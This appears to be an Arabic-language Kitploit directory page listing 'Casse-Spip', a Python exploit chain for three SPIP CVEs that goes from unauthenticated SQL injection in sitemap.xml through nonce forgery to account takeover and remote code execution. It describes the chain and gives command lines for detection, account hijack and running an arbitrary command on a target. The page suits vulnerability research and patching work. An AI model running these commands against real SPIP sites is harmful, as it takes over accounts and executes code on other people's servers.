Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
spip-exploits — سلسلة استغلال Python لثغرات SPIP CVEs 2026-72708/72709/72710، تربط حقن SQL غير المصادق عليه بالاستيلاء على الحساب وتنفيذ التعليمات البرمجية عن بُعد. | Kitploit
أدوات/GitHubGitHub/ambionics/spip-exploits
أطر الاستغلالتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالأوراق والأبحاث
GitHubambionics/spip-exploits

spip-exploits

سلسلة استغلال Python لثغرات SPIP CVEs 2026-72708/72709/72710، تربط حقن SQL غير المصادق عليه بالاستيلاء على الحساب وتنفيذ التعليمات البرمجية عن بُعد.

عرض المستودع
1منذ يوم واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Casse-Spip (CVE-2026-72708، CVE-2026-72709، CVE-2026-72710)

من حقن SQL بدون مصادقة إلى تنفيذ تعليمات برمجية عن بُعد

استغلال لـ CVE-2026-72708، وCVE-2026-72709 وCVE-2026-72710 التي اكتشفها Franck Chevalier (Wayko)

للاطلاع على تحليل تقني معمّق كامل، اقرأ المقال الكامل على مدونة Lexfo.

إخلاء المسؤولية

يُقدَّم هذا المستودع لأغراض البحث والأمن الدفاعي فقط. لا يتحمّل المؤلف أي مسؤولية عن إساءة استخدام هذه المعلومات.


نظرة عامة

نقطة الدخول هي حقن SQL في صفحة sitemap.xml العامة لتسريب alea_ephemere.

بهذا السر، يمكن تزوير nonces صالحة لإجراءات مجهولة الهوية.

يؤدي إجراءان إلى تنفيذ تعليمات برمجية عن بُعد (RCE) انطلاقًا من هناك:

  • action=editer_auteur الاستيلاء على الحساب، ثم RCE من المنطقة الخاصة.
  • action=editer_objet الإسناد الجماعي (mass assignment)، لكتابة صف في قائمة انتظار spip_jobs، ثم تنفيذه عبر action=cron.

الاستغلال

الإعداد

root@kitploit:~
python3 -m venv .venv
.venv/bin/pip install -r requirements.txt
.venv/bin/python3 casse-spip.py --help

الكشف

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000

السلسلة الكاملة 1 : الاستيلاء على الحساب (CVE-2026-72708 > CVE-2026-72709)

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --ato -i 1 -p "Casse-Spip!2026"

قبل الكتابة فوق البيانات، يقوم --ato باستخراج login الخاص بالهدف وتجزئة pass الحالية (عبر SQLi) حتى تتمكن من إعادتها لاحقًا باستخدام --restore-hash:

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --restore-hash '$2y$12$...' -i 1

السلسلة الكاملة 2 : RCE (CVE-2026-72708 > CVE-2026-72709 > CVE-2026-72710)

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --exploit -c "id"

سيتم كتابة الملف إلى IMG/casse-spip_<token>.html.


المراجع

  • منشور المدونة - تحليل تقني معمّق
  • Vulncheck - تفاصيل الثغرة
  • CVE-2026-72708
  • CVE-2026-72709
  • CVE-2026-72710
تنزيل الأداة